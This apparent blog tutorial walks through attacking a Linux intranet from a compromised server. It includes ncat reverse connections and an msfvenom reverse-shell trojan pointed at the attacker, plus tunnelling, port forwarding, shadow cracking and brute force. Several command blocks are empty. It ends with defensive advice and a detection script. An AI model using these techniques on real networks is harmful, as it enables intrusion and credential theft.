playing linux system Linux intranet penetration

Nothing great was ever achieved without enthusiasm

There is a lot of material about intranet penetration on the Internet, and I read a good deal of it before running this test. This article focuses on Linux because the test did not involve any Windows systems. The principles of intranet penetration are similar on Linux and Windows; only the tools differ.

Collecting test network environment

When we get a server inside the target intranet (a compromised host, which this article calls a "broiler"), the first thing to do is collect information. I think one of the most important things to collect is the network environment of the broiler.

lab environment

First introduce the server environment of this test:

  • Attack machine Mac: 110.xx.xx.xx external network
  • Broiler centos: 192.168.16.x target intranet 16 network segment system
  • Intranet penetration range: Target intranet 17 network segment system

This test assumes that the broiler server exposes a vulnerable web application and that a webshell has already been planted on it.
The purpose of this test: starting from the shell on the broiler server, penetrate further into the servers on intranet segment 17.

What network data is collected and tested?

OK, I now have a shell on the broiler. Which parts of its network environment should be collected, and how should they be tested? I think at least the following network information should be collected:

  • Connectivity of the broiler server to the external network
  • Connectivity of the broiler server to other network segments on the intranet
  • Is there a port access restriction between the broiler server and the external network?
  • Is there a port access restriction between the broiler server and other network segments on the intranet?

Note: Connectivity mainly refers to the ability to ping, and both parties need to ping each other; port access restrictions refer to whether there is a bastion machine or firewall on the target network boundary, and whether there are restrictions on the ports that enter or leave.

Port Access Limit Test

The ping test is not introduced here. It mainly explains how to test the port access restrictions. The tools that can be used are as follows:

  • curl, wget (can connect web services, mainly 80, 443, 8000 + ports)
  • telnet (actively connect to the specified port of the specified ip)
  • nmap (scans ports and shows whether each is open or filtered)
  • ncat (can create port listener, you can also connect actively)
  • python (can actively create port listeners)

Before testing port access restrictions, we need to figure out the current network environment. In this test, the attacker is on the external network and the broiler is on the intranet. Therefore, under normal circumstances, the attacker cannot directly access a port on the broiler (requires network border router to do port mapping).

Reverse connection test

When testing port access restrictions, we can first use ncat to listen on a port on the attacker.

ncat -l -p 9999

Then use ncat or telnet tools to try to connect on the broiler, which I call the reverse connection test.

ncat 110.xx.xx.xx 9999

Note: The listening port can be chosen at random. Try several different ports, several times. If the broiler can reach any port on the attack machine, the target network boundary does not restrict connections in the outbound direction. Knowing this is very useful for the port forwarding described later.

Forward connection test

We can also listen on a port on the broiler and try to connect to it from the attack machine. I call this a forward connection test. The address to connect to is the broiler's external network IP: the web application on the broiler must be reachable through an external IP or domain name, and in this test that IP is not the broiler's real address but the address of the target's border network device. The border device maps its web port (external network IP) to the web port of the broiler (intranet IP) through port mapping.
The reason for trying other ports on the broiler's external address is that some careless administrators set up full port mapping on the network device, so that every port on the broiler is mapped to the same port on the network edge device. In that case the broiler is effectively sitting directly on the external network.

Collecting server information

Collecting information can be said to be the first step of penetration testing. The intranet penetration is also the same. The more server information collected, the greater the success rate of penetration.

Viewing the system kernel

View the kernel version on the Linux system as follows:

The usual intrusion path is to escalate privileges first. Privileges can be escalated through Linux kernel vulnerabilities, so the kernel version is checked first, then a matching exp is looked up on an exp search website and uploaded to escalate privileges. This test does not involve privilege escalation, so it is not tested here. One more remark: kernel exploits carry a risk of crashing the machine, so be cautious.

View operating system bit width

Check whether the Linux system is 32-bit or 64-bit as follows:

getconf LONG_BIT

Description: Knowing whether the system is 32-bit or 64-bit is useful for generating msf Trojans later.

System sensitive information

Collect some system-related sensitive information, such as account passwords, logs, history commands, ssh files, and so on.

/var/log

web sensitive information

If the web application exists on the server, you can check whether there is sensitive information in the web directory, such as the configuration file connecting to the database.

Intranet scanning

After the information collection is complete, you can try to scan the machines on the internal network: host survival scans, port scans, arp scans, and so on. Port scanning can use tools such as nmap and msf. If these tools are not installed on the server, there are usually three ways to achieve intranet port scanning. The first is to install the scanning tool on the server. This is not recommended here, because it is complicated and troublesome (of course, you can upload a Python port-scanning script instead, which is more convenient than compiling and installing a tool). The second is port forwarding: an intranet port is forwarded to the external network and scanned there. The third is proxy scanning: the attack machine, which has the scanning tools, is proxied into the target intranet environment.
Whether it is port forwarding scanning or proxy scanning, the principle is to open up the connectivity between the attacking machine (external network) and the broiler (intranet), that is, the attacking machine can directly access the intranet resources where the broiler is located. The connection here does not rely on the port mapping function of the target network edge device, so it is different from the connection generated by the attacker accessing the broiler web service.

Port Forwarding

In order to achieve the "direct" connection described above, we need an intermediate bridge to pass data between the internal and external networks (attack machine and broiler). There are many ways to build such a bridge. The first that comes to mind is port forwarding, that is, forwarding a port on the broiler server to a port on the attack machine, so that accessing that port on the attack machine is equivalent to accessing the port on the broiler server.

Port forwarding tools: lcx, meterpreter, etc., the specific usage will be introduced later
Port forwarding type: tcp port forwarding, http forwarding, ssh forwarding, etc.

tcp port forwarding

Local forwarding: The attack machine listens on ports 2222 and 3333, and the broiler connects to port 2222 of the attack machine and forwards the broiler's port 22.
Forward connection principle:

Broiler port 22 <--> broiler random high port <--> broiler random high port <--> attack machine port 2222 <--> attack machine random high port <--> attack machine port 3333

Note: At this point we connect to the 3333 port of the attack machine, which is equivalent to the 22 port connected to the broiler.

Remote forwarding: The attack machine listens on ports 2222 and 3333, and the broiler connects to port 2222 of the attack machine and forwards port 22 of the intranet target server (provided that the broiler can connect to port 22 of the target server).
Forward connection principle:

Intranet target server port 22 <--> broiler random high port <--> broiler random high port <--> attack machine port 2222 <--> attack machine random high port <--> attack machine port 3333

Note: At this point, connecting to port 3333 of the attack machine is equivalent to connecting to port 22 of the target server.
Note: From the connection process above, it is easy to see that port forwarding is hard to prevent. The port on the attack machine is random and unpredictable, so it is impossible to write a port-specific policy for it on the bastion machine or firewall, unless the server is forbidden from accessing all external ports (in reality, most restrictions are placed on port connections in the forward direction).

http forwarding

Some security-conscious administrators prohibit certain servers from accessing the external network, that is, the server is not allowed to connect to any external network port. In that case ordinary tcp port forwarding has no effect, because forwarding requires that the two sides can connect to each other. Here you can use http forwarding.
Forward connection principle:

Broiler web port (80) <--> network border device port (80) <--> attacker random port

Note: The reason for this connection is the web service on the server and the mapping function of the network boundary device.

Note: Although the broiler cannot access any port on the external network, as long as it provides a web service to the outside it can still communicate with the outside world. This communication is limited to the web service port, and the broiler does not communicate with the attack machine directly; it goes through the border device.

Proxy scanning of the intranet

The sections above describe the use and principle of several kinds of port forwarding. Port forwarding is powerful but also very limited, because each forwarded port can only reach one port on one ip, so it is not the best option for scanning. There is a better technical solution, proxy scanning. The principle is similar to port forwarding in that a bridge has to be built, but this bridge is usually not a port; it is a shell or a session.

Proxy scanning can also be divided into tcp proxy scanning and http proxy scanning.

http proxy forwarding

If the target server has a web system, you can use reGeorg + proxychains.
Upload the reGeorg tunnel file to the website directory on the broiler server. The attacker executes:

Then modify the proxychains.conf configuration file:
vim /etc/proxychains.conf (on a Mac it is ~/.proxychains/proxychains.conf, do not create it yourself)

Add socks5 2333 in the last line (same port as reGeorg)

Finally, when using a scan tool on the attack machine, add proxychains4 before the command, for example:

proxychains4 nmap -sT -Pn -n

Note: This scheme suits the case where the attack machine and the broiler server are each in their own intranet environment. The attack machine can access the http service of the target server, and the proxy is forwarded through that http service (which is slower).

tcp proxy forwarding

Idea: Use a metasploit Trojan to bounce a meterpreter shell from the broiler back to the attack machine, then set up a route on the meterpreter shell. The network segment where the broiler is located can then be scanned directly from the attack machine (scanning across network segments is possible here).

Generate msf Trojan

Generate Trojans:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attacker ip LPORT=8000 -f elf > shell_8000.elf

Because the attack machine cannot access ports on the broiler but the broiler can access ports on the attack machine, a reverse Trojan is generated.

Rebound shell

The attacker runs msfconsole and uses the exploit/multi/handler module, with the payload set to linux/x86/meterpreter/reverse_tcp, the same payload used to generate the Trojan. LPORT is set to the port that the Trojan will connect to. Once run, it listens on a port on the attack machine and waits for the Trojan to connect.
At this point, shell_8000.elf is uploaded to the broiler server. After the permission is added and the Trojan is run, it actively connects to the port the attack machine is listening on, and a meterpreter shell is obtained on the attack machine.

Setting up routing

In the previous step, a session was obtained. This session connects the attack machine and the broiler to each other.
View the broiler's network segments:

run get_local_subnets

Add a route:

View route:

In general, setting up the route here is enough. Sometimes, though, the route works in the meterpreter but has no effect in msf, so it can be set again in msf (the premise is that the meterpreter session stays alive). Put the session into the background and add the route in msf.
View route:

The above is the result after the routes have been added. The command to add a route:

Note: 12 indicates the session id. Since we need to access network segment 17, a route for segment 17 must be added as well.
Description: The two routes above mean that if the attack machine wants to access resources on segment 17 or segment 16, the next hop is session 12. What a next hop is will not be explained here. In short, the attack machine can now access the broiler's network resources.
Forward connection principle:
Attack machine <-->meterpreter_shell(session)<-->broiler # This is not a port concept, but a route

tcp global proxy forwarding

With the settings above, intranet resources can be accessed from within msf, but only from within msf. If you want other tools to use the proxy as well, you need to set up a global proxy. This uses the socks4a proxy module in the msf framework, located at auxiliary/server/socks4a, together with proxychains, in the same way as the http proxy.

Note: This proxy is a tcp proxy, not an http proxy, so it requires that either the target server or the attacker's server be in the external network environment. Otherwise the Trojan's port cannot be connected and no meterpreter shell can be obtained.

For Metasploit operation, refer to: [Infiltration Artifact Series] Metasploit

Port Scanning Tool

It is recommended to use metasploit for tcp proxy forwarding, and use many scanning modules integrated on msf to directly scan.
Scan module:

  • auxiliary/scanner/portscan port scan
  • scanner/portscan/syn SYN port scan
  • scanner/portscan/tcp TCP port scan

In addition, you can also use nmap and other scanning tools, combined with tcp global proxy forwarding.

For 22-port intrusion

After the intranet server ports have been scanned, servers with port 22 open can be tried first. There are usually two ways to attack port 22. The first is to read the broiler's plaintext password and then try to log in with it. The second is dictionary brute-force login.

Try hash cracking

If the permissions are sufficient, we can successfully read the contents of the /etc/shadow file, but it is ciphertext, so you can try to use the tool to crack.

Note: mimikatz can be used under Windows.

Note: Obtaining the plaintext password of a Linux account is very effective. The intranet may be managed by only a few administrators, and the passwords set on different servers may be the same, so a password obtained from one server can be tried against port 22 of the remaining intranet servers.

Dictionary brute force

There is not much to say here. It mainly depends on how good the dictionary is and whether there is any limit in place to prevent brute forcing.

  • hydra
  • corresponding module on msf

Intrusion against other ports

In addition to port 22, ports 21 (ftp), 3306 (mysql), 1433 (mssql) and so on can be brute-forced. What about other ports, such as 445 and 443? These can be attacked through the corresponding vulnerabilities: scan with the nessus scanner, then attack the discovered vulnerabilities with the corresponding msf modules.

Intrusion against web services

In addition to the ports above, there is a special class of ports: web service ports such as 80, 443 and 8000+. Web applications run on these ports, and web applications are prone to vulnerabilities. It is therefore worth focusing on finding intranet servers that run a web service and testing their web applications following the usual web penetration testing process.

Counterattack of port forwarding

The port forwarding technique was introduced earlier, but I did not use it during scanning. Does that mean port forwarding has no use in intranet penetration?
Not at all. The exploit phase after the intranet scan is where port forwarding really comes into play. At this stage, port forwarding can be used to forward a single port of a vulnerable server and work on it separately. Think of using lcx to forward port 3389 on Windows; port 22 can be forwarded the same way under Linux. It is even better to forward port 80, so that an intranet web service can be accessed locally, the web penetration routine can continue, and the attack surface is expanded.

meterpreter implements port forwarding

In the meterpreter shell, type:

meterpreter> portfwd add -l 55555 -r -p 3306


Forward the 22 port of the broiler to the 2222 port of the attacker and see the connection.
It was found that the attacker listened on port 2222 and connected to a high port outside the machine.

The 22 port of the broiler is also connected to a high port of the broiler itself.

So how are the two high ports on the two servers connected to each other? I think it is definitely through the meterpreter session. The meterpreter session acts as a middleman, passing along messages that could not otherwise be delivered.

lcx port forwarding

Attack machine:

lcx -listen 2222 3333 # 2222 is the forwarding port, 3333 is any unoccupied port of the machine


lcx -slave 2222 3389 is the attacker’s external network ip, 2222 is the forwarding port, is the broiler intranet ip, and 3389 is the remote terminal port.

Intranet sniffing

Cain can be used under Windows, and modules in msf can be used under Linux. Under normal circumstances it is best not to sniff the intranet, because it is too noisy and may affect the intranet network.

linux intranet security advice

Having covered so many intranet penetration routines, it is customary to give some recommendations for securing the intranet. These are only my personal opinions and are open to discussion.

  • Install monitoring software on each server to monitor and block Trojans (monitor Trojan files and behavior)
  • Monitor newly opened ports on the server and check their connections for anything abnormal (monitor abnormal ports)
  • Patch servers promptly, including the latest system vulnerability patches (reduce vulnerabilities)
  • Run applications on the server with low privileges (makes privilege escalation harder)
  • Forbid servers that do not need external network access from connecting to the external network (reduces the risk of being invaded)
  • Log and monitor in real time (monitor abnormal operations and brute-force behavior)
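
The advice above on monitoring newly opened ports and abnormal connections can be checked against the kernel's socket table. The following is an added example, not code from the original article: it parses text in /proc/net/tcp layout and flags listeners outside a baseline and connections that the server itself initiated to non-intranet addresses, which is how the reverse connection and tcp forwarding described earlier appear on the host. The sample table, the baseline ports and the internal ranges are assumptions constructed for illustration.

```python
import ipaddress
import socket
import struct

# Constructed sample in /proc/net/tcp layout (not captured from a real host).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    48        0 1002
   2: 00000000:270F 00000000:0000 0A 00000000:00000000 00:00000000 00000000    48        0 1003
   3: 0510A8C0:0050 327100CB:C93A 01 00000000:00000000 00:00000000 00000000    48        0 1004
   4: 0510A8C0:A8CA 077100CB:1F40 01 00000000:00000000 00:00000000 00000000    48        0 1005
   5: 0510A8C0:C738 1411A8C0:0016 01 00000000:00000000 00:00000000 00000000     0        0 1006
"""

# Assumption: address ranges treated as "intranet" and ports this server should expose.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
BASELINE_LISTENERS = {22, 80}
LISTEN, ESTABLISHED = "0A", "01"

def decode(endpoint):
    """'0510A8C0:0050' -> ('192.168.16.5', 80). Assumes a little-endian host (x86/ARM)."""
    ip_hex, port_hex = endpoint.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def parse(text):
    """Yield (local, remote, state) for each socket row, skipping the header line."""
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4:
            yield decode(fields[1]), decode(fields[2]), fields[3]

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)

def audit(text, baseline=BASELINE_LISTENERS):
    socks = list(parse(text))
    listening = {local[1] for local, _, state in socks if state == LISTEN}
    findings = [("new-listener", port, None) for port in sorted(listening - baseline)]
    for (_, lport), (rip, rport), state in socks:
        # A local port that is not a listener means this host initiated the connection.
        if state == ESTABLISHED and lport not in listening and not is_internal(rip):
            findings.append(("external-egress", lport, f"{rip}:{rport}"))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

On a live host, pass the contents of /proc/net/tcp instead of SAMPLE. The http forwarding case rides on the existing web port, so it shows up here only as ordinary inbound connections to port 80 and has to be looked for in the web server logs instead.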

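Article title: playing linux system Linux intranet penetration

Published: 2017-08-09 16:08

Last updated: 2019-08-16 15:08

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.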